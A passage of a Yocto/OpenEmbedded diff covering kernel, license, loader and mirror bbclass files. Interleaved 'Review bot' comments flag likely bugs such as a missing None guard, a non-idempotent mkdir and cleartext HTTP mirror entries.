+ fi
+ fi
fi
if [ "${UBOOT_SIGN_ENABLE}" = "1" -a -n "${UBOOT_DTB_BINARY}" ] ; then
# UBOOT_DTB_IMAGE is a realfile, but we can't use
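Review bot: The `ln -snf` for `fitImage-its-${INITRAMFS_IMAGE_NAME}-${KERNEL_FIT_LINK_NAME}` in the INITRAMFS_IMAGE branch is left without the `[ -n "${KERNEL_FIT_LINK_NAME}" ]` guard that this hunk adds around the other three symlinks. With an empty KERNEL_FIT_LINK_NAME it would still create a link whose name ends in a bare `-`. Wrapping it as `if [ -n "${KERNEL_FIT_LINK_NAME}" ] ; then ln -snf … ; fi` makes the four cases agree. kernel_do_deploy_append continues past the end of the hunk.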
@@ -527,3 +622,13 @@ kernel_do_deploy_append() {
fi
fi
}
+
+# The function below performs the following in case of initramfs bundles:
+# - Removes do_assemble_fitimage. FIT generation is done through
+# do_assemble_fitimage_initramfs. do_assemble_fitimage is not needed
+# and should not be part of the tasks to be executed.
+python () {
+ d.appendVarFlag('do_compile', 'vardeps', ' INITRAMFS_IMAGE_BUNDLE')
+ if d.getVar('INITRAMFS_IMAGE_BUNDLE') == "1":
+ bb.build.deltask('do_assemble_fitimage', d)
+}
diff --git a/meta/classes/kernel-module-split.bbclass b/meta/classes/kernel-module-split.bbclass
index c8ede26996..baa32e0a90 100644
--- a/meta/classes/kernel-module-split.bbclass
+++ b/meta/classes/kernel-module-split.bbclass
@@ -120,7 +120,10 @@ python split_kernel_module_packages () {
files = d.getVar('FILES_%s' % pkg)
files = "%s /etc/modules-load.d/%s.conf /etc/modprobe.d/%s.conf" % (files, basename, basename)
d.setVar('FILES_%s' % pkg, files)
- d.setVar('CONFFILES_%s' % pkg, files)
+
+ conffiles = d.getVar('CONFFILES_%s' % pkg)
+ conffiles = "%s /etc/modules-load.d/%s.conf /etc/modprobe.d/%s.conf" % (conffiles, basename, basename)
+ d.setVar('CONFFILES_%s' % pkg, conffiles)
if "description" in vals:
old_desc = d.getVar('DESCRIPTION_' + pkg) or ""
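Review bot: `d.getVar('CONFFILES_%s' % pkg)` returns None when the variable is unset, and the `%s` on the next line then writes the literal text `None` as the first entry of CONFFILES for the package. The DESCRIPTION lookup at the end of this hunk already guards against that with `or ""`, and the same works here: `conffiles = d.getVar('CONFFILES_%s' % pkg) or ""`. split_kernel_module_packages starts and ends outside the hunk.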
diff --git a/meta/classes/kernel-yocto.bbclass b/meta/classes/kernel-yocto.bbclass
index ec5fb7b1de..2abbc2ff66 100644
--- a/meta/classes/kernel-yocto.bbclass
+++ b/meta/classes/kernel-yocto.bbclass
@@ -105,6 +105,8 @@ do_kernel_metadata() {
cd ${S}
export KMETA=${KMETA}
+ bbnote "do_kernel_metadata: for summary/debug, set KCONF_AUDIT_LEVEL > 0"
+
# if kernel tools are available in-tree, they are preferred
# and are placed on the path before any external tools. Unless
# the external tools flag is set, in that case we do nothing.
@@ -192,7 +194,7 @@ do_kernel_metadata() {
# SRC_URI. If they were supplied, we convert them into include directives
# for the update part of the process
for f in ${feat_dirs}; do
- if [ -d "${WORKDIR}/$f/meta" ]; then
+ if [ -d "${WORKDIR}/$f/kernel-meta" ]; then
includes="$includes -I${WORKDIR}/$f/kernel-meta"
elif [ -d "${WORKDIR}/../oe-local-files/$f" ]; then
includes="$includes -I${WORKDIR}/../oe-local-files/$f"
@@ -252,6 +254,23 @@ do_kernel_metadata() {
bbfatal_log "Could not generate configuration queue for ${KMACHINE}."
fi
fi
+
+ if [ ${KCONF_AUDIT_LEVEL} -gt 0 ]; then
+ bbnote "kernel meta data summary for ${KMACHINE} (${LINUX_KERNEL_TYPE}):"
+ bbnote "======================================================================"
+ if [ -n "${KMETA_EXTERNAL_BSPS}" ]; then
+ bbnote "Non kernel-cache (external) bsp"
+ fi
+ bbnote "BSP entry point / definition: $bsp_definition"
+ if [ -n "$in_tree_defconfig" ]; then
+ bbnote "KBUILD_DEFCONFIG: ${KBUILD_DEFCONFIG}"
+ fi
+ bbnote "Fragments from SRC_URI: $sccs_from_src_uri"
+ bbnote "KERNEL_FEATURES: $KERNEL_FEATURES_FINAL"
+ bbnote "Final scc/cfg list: $sccs_defconfig $bsp_definition $sccs $KERNEL_FEATURES_FINAL"
+ fi
+
+ set -e
}
do_patch() {
@@ -281,6 +300,8 @@ do_patch() {
fi
done
fi
+
+ set -e
}
do_kernel_checkout() {
@@ -303,6 +324,21 @@ do_kernel_checkout() {
fi
fi
cd ${S}
+
+ # convert any remote branches to local tracking ones
+ for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
+ b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
+ git show-ref --quiet --verify -- "refs/heads/$b"
+ if [ $? -ne 0 ]; then
+ git branch $b $i > /dev/null
+ fi
+ done
+
+ # Create a working tree copy of the kernel by checking out a branch
+ machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
+
+ # checkout and clobber any unimportant files
+ git checkout -f ${machine_branch}
else
# case: we have no git repository at all.
# To support low bandwidth options for building the kernel, we'll just
@@ -325,20 +361,7 @@ do_kernel_checkout() {
git clean -d -f
fi
- # convert any remote branches to local tracking ones
- for i in `git branch -a --no-color | grep remotes | grep -v HEAD`; do
- b=`echo $i | cut -d' ' -f2 | sed 's%remotes/origin/%%'`;
- git show-ref --quiet --verify -- "refs/heads/$b"
- if [ $? -ne 0 ]; then
- git branch $b $i > /dev/null
- fi
- done
-
- # Create a working tree copy of the kernel by checking out a branch
- machine_branch="${@ get_machine_branch(d, "${KBRANCH}" )}"
-
- # checkout and clobber any unimportant files
- git checkout -f ${machine_branch}
+ set -e
}
do_kernel_checkout[dirs] = "${S}"
@@ -506,6 +529,8 @@ do_validate_branches() {
kgit-s2q --clean
fi
fi
+
+ set -e
}
OE_TERMINAL_EXPORTS += "KBUILD_OUTPUT"
diff --git a/meta/classes/kernel.bbclass b/meta/classes/kernel.bbclass
index 9e3c34ad48..ca7530095e 100644
--- a/meta/classes/kernel.bbclass
+++ b/meta/classes/kernel.bbclass
@@ -1,5 +1,7 @@
inherit linux-kernel-base kernel-module-split
+COMPATIBLE_HOST = ".*-linux"
+
KERNEL_PACKAGE_NAME ??= "kernel"
KERNEL_DEPLOYSUBDIR ??= "${@ "" if (d.getVar("KERNEL_PACKAGE_NAME") == "kernel") else d.getVar("KERNEL_PACKAGE_NAME") }"
@@ -73,7 +75,7 @@ python __anonymous () {
# KERNEL_IMAGETYPES may contain a mixture of image types supported directly
# by the kernel build system and types which are created by post-processing
# the output of the kernel build system (e.g. compressing vmlinux ->
- # vmlinux.gz in kernel_do_compile()).
+ # vmlinux.gz in kernel_do_transform_kernel()).
# KERNEL_IMAGETYPE_FOR_MAKE should contain only image types supported
# directly by the kernel build system.
if not d.getVar('KERNEL_IMAGETYPE_FOR_MAKE'):
@@ -89,6 +91,8 @@ python __anonymous () {
imagedest = d.getVar('KERNEL_IMAGEDEST')
for type in types.split():
+ if bb.data.inherits_class('nopackages', d):
+ continue
typelower = type.lower()
d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
d.setVar('FILES_' + kname + '-image-' + typelower, '/' + imagedest + '/' + type + '-${KERNEL_VERSION_NAME}' + ' /' + imagedest + '/' + type)
@@ -102,6 +106,8 @@ python __anonymous () {
# standalone for use by wic and other tools.
if image:
d.appendVarFlag('do_bundle_initramfs', 'depends', ' ${INITRAMFS_IMAGE}:do_image_complete')
+ if image and bb.utils.to_boolean(d.getVar('INITRAMFS_IMAGE_BUNDLE')):
+ bb.build.addtask('do_transform_bundled_initramfs', 'do_deploy', 'do_bundle_initramfs', d)
# NOTE: setting INITRAMFS_TASK is for backward compatibility
# The preferred method is to set INITRAMFS_IMAGE, because
@@ -137,13 +143,14 @@ do_unpack[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILD
do_clean[cleandirs] += " ${S} ${STAGING_KERNEL_DIR} ${B} ${STAGING_KERNEL_BUILDDIR}"
python do_symlink_kernsrc () {
s = d.getVar("S")
- if s[-1] == '/':
- # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as directory name and fail
- s=s[:-1]
kernsrc = d.getVar("STAGING_KERNEL_DIR")
if s != kernsrc:
bb.utils.mkdirhier(kernsrc)
bb.utils.remove(kernsrc, recurse=True)
+ if s[-1] == '/':
+ # drop trailing slash, so that os.symlink(kernsrc, s) doesn't use s as
+ # directory name and fail
+ s = s[:-1]
if d.getVar("EXTERNALSRC"):
# With EXTERNALSRC S will not be wiped so we can symlink to it
os.symlink(s, kernsrc)
@@ -192,6 +199,8 @@ UBOOT_LOADADDRESS ?= "${UBOOT_ENTRYPOINT}"
KERNEL_EXTRA_ARGS ?= ""
EXTRA_OEMAKE = " HOSTCC="${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS}" HOSTCPP="${BUILD_CPP}""
+EXTRA_OEMAKE += " HOSTCXX="${BUILD_CXX} ${BUILD_CXXFLAGS} ${BUILD_LDFLAGS}""
+
KERNEL_ALT_IMAGETYPE ??= ""
copy_initramfs() {
@@ -274,6 +283,14 @@ do_bundle_initramfs () {
}
do_bundle_initramfs[dirs] = "${B}"
+kernel_do_transform_bundled_initramfs() {
+ # vmlinux.gz is not built by kernel
+ if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
+ gzip -9cn < ${KERNEL_OUTPUT_DIR}/vmlinux.initramfs > ${KERNEL_OUTPUT_DIR}/vmlinux.gz.initramfs
+ fi
+}
+do_transform_bundled_initramfs[dirs] = "${B}"
+
python do_devshell_prepend () {
os.environ["LDFLAGS"] = ''
}
@@ -305,6 +322,10 @@ kernel_do_compile() {
export KBUILD_BUILD_TIMESTAMP="$ts"
export KCONFIG_NOTIMESTAMP=1
bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
+ else
+ ts=`LC_ALL=C date`
+ export KBUILD_BUILD_TIMESTAMP="$ts"
+ bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
fi
# The $use_alternate_initrd is only set from
# do_bundle_initramfs() This variable is specifically for the
@@ -323,12 +344,17 @@ kernel_do_compile() {
for typeformake in ${KERNEL_IMAGETYPE_FOR_MAKE} ; do
oe_runmake ${typeformake} CC="${KERNEL_CC} $cc_extra " LD="${KERNEL_LD}" ${KERNEL_EXTRA_ARGS} $use_alternate_initrd
done
+}
+
+kernel_do_transform_kernel() {
# vmlinux.gz is not built by kernel
if (echo "${KERNEL_IMAGETYPES}" | grep -wq "vmlinux\.gz"); then
mkdir -p "${KERNEL_OUTPUT_DIR}"
gzip -9cn < ${B}/vmlinux > "${KERNEL_OUTPUT_DIR}/vmlinux.gz"
fi
}
+do_transform_kernel[dirs] = "${B}"
+addtask transform_kernel after do_compile before do_install
do_compile_kernelmodules() {
unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
@@ -346,6 +372,10 @@ do_compile_kernelmodules() {
export KBUILD_BUILD_TIMESTAMP="$ts"
export KCONFIG_NOTIMESTAMP=1
bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
+ else
+ ts=`LC_ALL=C date`
+ export KBUILD_BUILD_TIMESTAMP="$ts"
+ bbnote "KBUILD_BUILD_TIMESTAMP: $ts"
fi
if (grep -q -i -e '^CONFIG_MODULES=y$' ${B}/.config); then
cc_extra=$(get_cc_option)
@@ -358,6 +388,10 @@ do_compile_kernelmodules() {
# other kernel modules and will look at this
# file to do symbol lookups
cp ${B}/Module.symvers ${STAGING_KERNEL_BUILDDIR}/
+ # 5.10+ kernels have module.lds that we need to copy for external module builds
+ if [ -e "${B}/scripts/module.lds" ]; then
+ install -Dm 0644 ${B}/scripts/module.lds ${STAGING_KERNEL_BUILDDIR}/scripts/module.lds
+ fi
else
bbnote "no modules to compile"
fi
@@ -371,8 +405,8 @@ kernel_do_install() {
unset CFLAGS CPPFLAGS CXXFLAGS LDFLAGS MACHINE
if (grep -q -i -e '^CONFIG_MODULES=y$' .config); then
oe_runmake DEPMOD=echo MODLIB=${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION} INSTALL_FW_PATH=${D}${nonarch_base_libdir}/firmware modules_install
- rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
- rm "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
+ rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/build"
+ rm -f "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/source"
# If the kernel/ directory is empty remove it to prevent QA issues
rmdir --ignore-fail-on-non-empty "${D}${nonarch_base_libdir}/modules/${KERNEL_VERSION}/kernel"
else
@@ -384,12 +418,26 @@ kernel_do_install() {
#
install -d ${D}/${KERNEL_IMAGEDEST}
install -d ${D}/boot
+
+ #
+ # When including an initramfs bundle inside a FIT image, the fitImage is created after the install task
+ # by do_assemble_fitimage_initramfs.
+ # This happens after the generation of the initramfs bundle (done by do_bundle_initramfs).
+ # So, at the level of the install task we should not try to install the fitImage. fitImage is still not
+ # generated yet.
+ # After the generation of the fitImage, the deploy task copies the fitImage from the build directory to
+ # the deploy folder.
+ #
+
for imageType in ${KERNEL_IMAGETYPES} ; do
- install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
- if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
- ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
+ if [ $imageType != "fitImage" ] || [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ] ; then
+ install -m 0644 ${KERNEL_OUTPUT_DIR}/${imageType} ${D}/${KERNEL_IMAGEDEST}/${imageType}-${KERNEL_VERSION}
+ if [ "${KERNEL_PACKAGE_NAME}" = "kernel" ]; then
+ ln -sf ${imageType}-${KERNEL_VERSION} ${D}/${KERNEL_IMAGEDEST}/${imageType}
+ fi
fi
done
+
install -m 0644 System.map ${D}/boot/System.map-${KERNEL_VERSION}
install -m 0644 .config ${D}/boot/config-${KERNEL_VERSION}
install -m 0644 vmlinux ${D}/boot/vmlinux-${KERNEL_VERSION}
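Review bot: The new guard in the `for imageType` loop compares `${INITRAMFS_IMAGE_BUNDLE}` with the literal `1`, while the anonymous python block changed in this same commit decides whether to add `do_transform_bundled_initramfs` with `bb.utils.to_boolean(d.getVar('INITRAMFS_IMAGE_BUNDLE'))`. If the variable holds any other value that to_boolean treats as true, the task is added but this loop still tries to install a fitImage that, per the new comment, does not exist yet. `$imageType` is also unquoted inside `[ ]`; `if [ "$imageType" != "fitImage" ] || [ "${INITRAMFS_IMAGE_BUNDLE}" != "1" ] ; then` fixes the quoting, and the comparison itself should follow the same boolean parsing as the python side. kernel_do_install starts and ends outside this hunk.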
@@ -397,7 +445,6 @@ kernel_do_install() {
install -d ${D}${sysconfdir}/modules-load.d
install -d ${D}${sysconfdir}/modprobe.d
}
-do_install[prefuncs] += "package_get_auto_pr"
# Must be ran no earlier than after do_kernel_checkout or else Makefile won't be in ${S}/Makefile
do_kernel_version_sanity_check() {
@@ -563,11 +610,11 @@ do_savedefconfig() {
do_savedefconfig[nostamp] = "1"
addtask savedefconfig after do_configure
-inherit cml1
+inherit cml1 pkgconfig
-KCONFIG_CONFIG_COMMAND_append = " HOSTLDFLAGS='${BUILD_LDFLAGS}'"
+KCONFIG_CONFIG_COMMAND_append = " LD='${KERNEL_LD}' HOSTLDFLAGS='${BUILD_LDFLAGS}'"
-EXPORT_FUNCTIONS do_compile do_install do_configure
+EXPORT_FUNCTIONS do_compile do_transform_kernel do_transform_bundled_initramfs do_install do_configure
# kernel-base becomes kernel-${KERNEL_VERSION}
# kernel-image becomes kernel-image-${KERNEL_VERSION}
@@ -673,7 +720,7 @@ do_sizecheck() {
at_least_one_fits=
for imageType in ${KERNEL_IMAGETYPES} ; do
size=`du -ks ${B}/${KERNEL_OUTPUT_DIR}/$imageType | awk '{print $1}'`
- if [ $size -ge ${KERNEL_IMAGE_MAXSIZE} ]; then
+ if [ $size -gt ${KERNEL_IMAGE_MAXSIZE} ]; then
bbwarn "This kernel $imageType (size=$size(K) > ${KERNEL_IMAGE_MAXSIZE}(K)) is too big for your device."
else
at_least_one_fits=y
diff --git a/meta/classes/libc-package.bbclass b/meta/classes/libc-package.bbclass
index de3b4250c7..72f489d673 100644
--- a/meta/classes/libc-package.bbclass
+++ b/meta/classes/libc-package.bbclass
@@ -45,6 +45,7 @@ PACKAGE_NO_GCONV ?= "0"
OVERRIDES_append = ":${TARGET_ARCH}-${TARGET_OS}"
locale_base_postinst_ontarget() {
+mkdir ${libdir}/locale
localedef --inputfile=${datadir}/i18n/locales/%s --charmap=%s %s
}
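Review bot: The added `mkdir ${libdir}/locale` in locale_base_postinst_ontarget fails when the directory already exists. This is presumably the normal case once a second locale package runs this postinst on the same target. If the generated postinst runs with errexit, the `localedef` call on the next line is never reached; otherwise every run after the first prints a spurious error. `mkdir -p ${libdir}/locale` makes the step idempotent.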
@@ -355,7 +356,7 @@ python package_do_split_gconvs () {
m.write("\t@echo 'Progress %d/%d'\n" % (i, total))
m.write("\t" + makerecipe + "\n\n")
d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile)))
- d.setVarFlag("oe_runmake", "progress", "outof:Progress\s(\d+)/(\d+)")
+ d.setVarFlag("oe_runmake", "progress", r"outof:Progress\s(\d+)/(\d+)")
bb.note("Executing binary locale generation makefile")
bb.build.exec_func("oe_runmake", d)
bb.note("collecting binary locales from locale tree")
diff --git a/meta/classes/license.bbclass b/meta/classes/license.bbclass
index f90176d6c0..806b5069fd 100644
--- a/meta/classes/license.bbclass
+++ b/meta/classes/license.bbclass
@@ -31,7 +31,8 @@ python do_populate_lic() {
f.write("%s: %s\n" % (key, info[key]))
}
-# it would be better to copy them in do_install_append, but find_license_filesa is python
+PSEUDO_IGNORE_PATHS .= ",${@','.join(((d.getVar('COMMON_LICENSE_DIR') or '') + ' ' + (d.getVar('LICENSE_PATH') or '') + ' ' + d.getVar('COREBASE') + '/meta/COPYING').split())}"
+# it would be better to copy them in do_install:append, but find_license_filesa is python
python perform_packagecopy_prepend () {
enabled = oe.data.typed_value('LICENSE_CREATE_PACKAGE', d)
if d.getVar('CLASSOVERRIDE') == 'class-target' and enabled:
@@ -90,17 +91,17 @@ def copy_license_files(lic_files_paths, destdir):
os.link(src, dst)
except OSError as err:
if err.errno == errno.EXDEV:
- # Copy license files if hard-link is not possible even if st_dev is the
+ # Copy license files if hardlink is not possible even if st_dev is the
# same on source and destination (docker container with device-mapper?)
canlink = False
else:
raise
- # Only chown if we did hardling, and, we're running under pseudo
+ # Only chown if we did hardlink and we're running under pseudo
if canlink and os.environ.get('PSEUDO_DISABLED') == '0':
os.chown(dst,0,0)
if not canlink:
- begin_idx = int(beginline)-1 if beginline is not None else None
- end_idx = int(endline) if endline is not None else None
+ begin_idx = max(0, int(beginline) - 1) if beginline is not None else None
+ end_idx = max(0, int(endline)) if endline is not None else None
if begin_idx is None and end_idx is None:
shutil.copyfile(src, dst)
else:
@@ -152,6 +153,10 @@ def find_license_files(d):
find_license(node.s.replace("+", "").replace("*", ""))
self.generic_visit(node)
+ def visit_Constant(self, node):
+ find_license(node.value.replace("+", "").replace("*", ""))
+ self.generic_visit(node)
+
def find_license(license_type):
try:
bb.utils.mkdirhier(gen_lic_dest)
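Review bot: The new `visit_Constant` calls `node.value.replace(...)` without checking the value's type, and an `ast.Constant` node can carry numbers, `None` or bytes as well as strings. The `visit_Str` handler it sits beside only ever received strings, so this is a new way for the visitor to raise `AttributeError`, if the parsed license expression can contain a non-string literal (not determinable from this hunk). Guarding the call with `if isinstance(node.value, str):` keeps the behaviour for license names and skips everything else. The visitor class and find_license_files both begin outside the hunk.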
diff --git a/meta/classes/license_image.bbclass b/meta/classes/license_image.bbclass
index a8c72da3cb..325b3cbba7 100644
--- a/meta/classes/license_image.bbclass
+++ b/meta/classes/license_image.bbclass
@@ -1,3 +1,5 @@
+ROOTFS_LICENSE_DIR = "${IMAGE_ROOTFS}/usr/share/common-licenses"
+
python write_package_manifest() {
# Get list of installed packages
license_image_dir = d.expand('${LICENSE_DIRECTORY}/${IMAGE_NAME}')
@@ -7,8 +9,8 @@ python write_package_manifest() {
pkgs = image_list_installed_packages(d)
output = format_pkg_list(pkgs)
- open(os.path.join(license_image_dir, 'package.manifest'),
- 'w+').write(output)
+ with open(os.path.join(license_image_dir, 'package.manifest'), "w+") as package_manifest:
+ package_manifest.write(output)
}
python license_create_manifest() {
@@ -105,8 +107,7 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
copy_lic_manifest = d.getVar('COPY_LIC_MANIFEST')
copy_lic_dirs = d.getVar('COPY_LIC_DIRS')
if rootfs and copy_lic_manifest == "1":
- rootfs_license_dir = os.path.join(d.getVar('IMAGE_ROOTFS'),
- 'usr', 'share', 'common-licenses')
+ rootfs_license_dir = d.getVar('ROOTFS_LICENSE_DIR')
bb.utils.mkdirhier(rootfs_license_dir)
rootfs_license_manifest = os.path.join(rootfs_license_dir,
os.path.split(license_manifest)[1])
@@ -125,7 +126,6 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
licenses = os.listdir(pkg_license_dir)
for lic in licenses:
- rootfs_license = os.path.join(rootfs_license_dir, lic)
pkg_license = os.path.join(pkg_license_dir, lic)
pkg_rootfs_license = os.path.join(pkg_rootfs_license_dir, lic)
@@ -144,11 +144,14 @@ def write_license_files(d, license_manifest, pkg_dic, rootfs=True):
bad_licenses) == False:
continue
+ # Make sure we use only canonical name for the license file
+ generic_lic_file = "generic_%s" % generic_lic
+ rootfs_license = os.path.join(rootfs_license_dir, generic_lic_file)
if not os.path.exists(rootfs_license):
oe.path.copyhardlink(pkg_license, rootfs_license)
if not os.path.exists(pkg_rootfs_license):
- os.symlink(os.path.join('..', lic), pkg_rootfs_license)
+ os.symlink(os.path.join('..', generic_lic_file), pkg_rootfs_license)
else:
if (oe.license.license_ok(canonical_license(d,
lic), bad_licenses) == False or
@@ -208,9 +211,10 @@ def get_deployed_dependencies(d):
deploy = {}
# Get all the dependencies for the current task (rootfs).
taskdata = d.getVar("BB_TASKDEPDATA", False)
+ pn = d.getVar("PN")
depends = list(set([dep[0] for dep
in list(taskdata.values())
- if not dep[0].endswith("-native")]))
+ if not dep[0].endswith("-native") and not dep[0] == pn]))
# To verify what was deployed it checks the rootfs dependencies against
# the SSTATE_MANIFESTS for "deploy" task.
@@ -254,3 +258,13 @@ python do_populate_lic_deploy() {
addtask populate_lic_deploy before do_build after do_image_complete
do_populate_lic_deploy[recrdeptask] += "do_populate_lic do_deploy"
+python license_qa_dead_symlink() {
+ import os
+
+ for root, dirs, files in os.walk(d.getVar('ROOTFS_LICENSE_DIR')):
+ for file in files:
+ full_path = root + "/" + file
+ if os.path.islink(full_path) and not os.path.exists(full_path):
+ bb.error("broken symlink: " + full_path)
+}
+IMAGE_QA_COMMANDS += "license_qa_dead_symlink"
diff --git a/meta/classes/linux-dummy.bbclass b/meta/classes/linux-dummy.bbclass
new file mode 100644
index 0000000000..cd8791557d
--- /dev/null
+++ b/meta/classes/linux-dummy.bbclass
@@ -0,0 +1,26 @@
+
+python __anonymous () {
+ if d.getVar('PREFERRED_PROVIDER_virtual/kernel') == 'linux-dummy':
+ # copy part codes from kernel.bbclass
+ kname = d.getVar('KERNEL_PACKAGE_NAME') or "kernel"
+
+ # set an empty package of kernel-devicetree
+ d.appendVar('PACKAGES', ' %s-devicetree' % kname)
+ d.setVar('ALLOW_EMPTY_%s-devicetree' % kname, '1')
+
+ # Merge KERNEL_IMAGETYPE and KERNEL_ALT_IMAGETYPE into KERNEL_IMAGETYPES
+ type = d.getVar('KERNEL_IMAGETYPE') or ""
+ alttype = d.getVar('KERNEL_ALT_IMAGETYPE') or ""
+ types = d.getVar('KERNEL_IMAGETYPES') or ""
+ if type not in types.split():
+ types = (type + ' ' + types).strip()
+ if alttype not in types.split():
+ types = (alttype + ' ' + types).strip()
+
+ # set empty packages of kernel-image-*
+ for type in types.split():
+ typelower = type.lower()
+ d.appendVar('PACKAGES', ' %s-image-%s' % (kname, typelower))
+ d.setVar('ALLOW_EMPTY_%s-image-%s' % (kname, typelower), '1')
+}
+
diff --git a/meta/classes/linuxloader.bbclass b/meta/classes/linuxloader.bbclass
index ec0e0556dd..796ab3afe4 100644
--- a/meta/classes/linuxloader.bbclass
+++ b/meta/classes/linuxloader.bbclass
@@ -1,6 +1,6 @@
def get_musl_loader_arch(d):
import re
- ldso_arch = None
+ ldso_arch = "NotSupported"
targetarch = d.getVar("TARGET_ARCH")
if targetarch.startswith("microblaze"):
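Review bot: The default here changes from `None` to the string `"NotSupported"`, and the same replacement is made in get_glibc_loader and in the libc-baremetal branch of get_linuxloader. A non-empty string is truthy, so any caller that tests the result with `if loader:` or `is None` would now treat the sentinel as a real loader path. The callers are not visible in this diff, so that needs checking. The reason for the new sentinel is not stated in the code; a comment above the first assignment saying why a string is returned and how callers should compare against it would help, since the literal is now repeated in three places.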
@@ -30,7 +30,7 @@ def get_musl_loader(d):
def get_glibc_loader(d):
import re
- dynamic_loader = None
+ dynamic_loader = "NotSupported"
targetarch = d.getVar("TARGET_ARCH")
if targetarch in ["powerpc", "microblaze"]:
dynamic_loader = "${base_libdir}/ld.so.1"
@@ -56,7 +56,7 @@ def get_linuxloader(d):
overrides = d.getVar("OVERRIDES").split(":")
if "libc-baremetal" in overrides:
- return None
+ return "NotSupported"
if "libc-musl" in overrides:
dynamic_loader = get_musl_loader(d)
diff --git a/meta/classes/metadata_scm.bbclass b/meta/classes/metadata_scm.bbclass
index 58bb4c555a..47cb969b8d 100644
--- a/meta/classes/metadata_scm.bbclass
+++ b/meta/classes/metadata_scm.bbclass
@@ -1,6 +1,3 @@
-METADATA_BRANCH ?= "${@base_detect_branch(d)}"
-METADATA_REVISION ?= "${@base_detect_revision(d)}"
-
def base_detect_revision(d):
path = base_get_scmbasepath(d)
return base_get_metadata_git_revision(path, d)
@@ -40,3 +37,8 @@ def base_get_metadata_git_revision(path, d):
except bb.process.ExecutionError:
rev = '<unknown>'
return rev.strip()
+
+METADATA_BRANCH := "${@base_detect_branch(d)}"
+METADATA_BRANCH[vardepvalue] = "${METADATA_BRANCH}"
+METADATA_REVISION := "${@base_detect_revision(d)}"
+METADATA_REVISION[vardepvalue] = "${METADATA_REVISION}"
diff --git a/meta/classes/mirrors.bbclass b/meta/classes/mirrors.bbclass
index 87bba41472..669d0cc8ff 100644
--- a/meta/classes/mirrors.bbclass
+++ b/meta/classes/mirrors.bbclass
@@ -29,7 +29,6 @@ ftp://dante.ctan.org/tex-archive ftp://ftp.fu-berlin.de/tex/CTAN \n \
ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \
ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \
ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \
-http://ftp.info-zip.org/pub/infozip/src/ http://mirror.switch.ch/ftp/mirror/infozip/src/ \n \
http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \
http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \
${APACHE_MIRROR} http://www.us.apache.org/dist \n \
@@ -43,6 +42,7 @@ ftp://sourceware.org/pub http://ftp.gwdg.de/pub/linux/sources.redhat.com/sourcew
cvs://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
svn://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
git://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
+gitsm://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
hg://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
bzr://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
p4://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
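Review bot: The added `gitsm://` fallback points at `http://downloads.yoctoproject.org/mirror/sources/`, and the matching line in the next hunk points at `http://sources.openembedded.org/`, so submodule mirror tarballs would be fetched over cleartext HTTP. The integrity of what is downloaded then rests entirely on the fetcher's own revision and checksum verification rather than on the transport. The last hunk of this file already uses `https://` for the kernel.org mirrors. If these hosts serve HTTPS, the new entries could be written as `gitsm://.*/.* https://downloads.yoctoproject.org/mirror/sources/ \n \` instead of copying the older `http://` pattern.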
@@ -53,6 +53,7 @@ npm://.*/?.* http://downloads.yoctoproject.org/mirror/sources/ \n \
cvs://.*/.* http://sources.openembedded.org/ \n \
svn://.*/.* http://sources.openembedded.org/ \n \
git://.*/.* http://sources.openembedded.org/ \n \
+gitsm://.*/.* http://sources.openembedded.org/ \n \
hg://.*/.* http://sources.openembedded.org/ \n \
bzr://.*/.* http://sources.openembedded.org/ \n \
p4://.*/.* http://sources.openembedded.org/ \n \
@@ -62,6 +63,8 @@ ftp://.*/.* http://sources.openembedded.org/ \n \
npm://.*/?.* http://sources.openembedded.org/ \n \
${CPAN_MIRROR} http://cpan.metacpan.org/ \n \
${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \
+https?$://downloads.yoctoproject.org/releases/uninative/ https://mirrors.kernel.org/yocto/uninative/ \n \
+https?$://downloads.yoctoproject.org/mirror/sources/ https://mirrors.kernel.org/yocto-sources/ \n \
"
# Use MIRRORS to provide git repo fallbacks using the https protocol, for cases
diff --git a/meta/classes/multilib.bbclass b/meta/classes/multilib.bbclass
index ee677da1e2..b5c59ac593 100644
